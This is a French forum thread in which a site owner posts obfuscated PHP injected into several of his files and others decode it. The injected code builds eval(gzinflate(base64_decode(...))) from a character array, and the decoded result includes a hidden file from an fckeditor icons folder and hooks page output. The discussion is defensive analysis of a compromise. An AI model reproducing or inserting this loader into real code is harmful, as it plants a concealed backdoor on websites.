Trace de hack

**Kontas** · 06/03/2017, 15h32

J'ai trouver cette trace de hack dans un vieux fichier php.

Auriez vous une idée de sa fonction ?

Ce code a été rajouter au début de quelques fichiers.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
 
$md5 = "144dd7a96dfb7230d6c4f790684cbd17";
$ae = array(
    "d",
    "(",
    'o',
    "t",
    "6",
    "r",
    "e",
    "l",
    'c',
    'v',
    'n',
    ")",
    'a',
    '_',
    'g',
    "s",
    'f',
    "4",
    'z',
    'i',
    ";",
    "$",
    "b",
);
$be1 = create_function(
    '$'.'v',
    $ae[6].$ae[9].$ae[12].$ae[7].$ae[1].$ae[14].$ae[18].$ae[19].$ae[10].$ae[16].$ae[7].$ae[12].$ae[3].$ae[6].$ae[1].$ae[22].$ae[12].$ae[15].$ae[6].$ae[4].$ae[17].$ae[13].$ae[0].$ae[6].$ae[8].$ae[2].$ae[0].$ae[6].$ae[1].$ae[21].$ae[9].$ae[11].$ae[11].$ae[11].$ae[20]
);
$be1(
    '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'
);
?>
<?php

**Geoffrey74** · 06/03/2017, 16h03

La fonction exécutée est :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

eval(gzinflate(base64_decode($v)))

Je suis en train d'essayé de décoder la longue suite de caractère.

**Tsilefy** · 07/03/2017, 01h11

Je parie que $v est $_POST, $_GET, $_COOKIE ou $_SESSIONS

**Geoffrey74** · 07/03/2017, 08h19

Je n'ai pas réussi à décoder la chaine, je retombe sur les mêmes fonctions. (faut dire que je suis mauvais à ce jeu là

)
Je me demande même si elle ne serait pas exécutée pour brouiller les pistes.

**badaze** · 07/03/2017, 19h23

Envoyé par Geoffrey74

Je n'ai pas réussi à décoder la chaine, je retombe sur les mêmes fonctions. (faut dire que je suis mauvais à ce jeu là

)
Je me demande même si elle ne serait pas exécutée pour brouiller les pistes.

Voici le code.

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
 
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/ccldv/www/marches-publics-dlva/fckeditor/editor/filemanager/browser/default/images/icons/32/b6e.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

**Geoffrey74** · 07/03/2017, 19h43

Pour ma culture perso, comment as-tu fait ?

Trace de hack

EDI, CMS, Outils, Scripts et API PHP

Vue hybride

Discussions similaires

Partager

Partager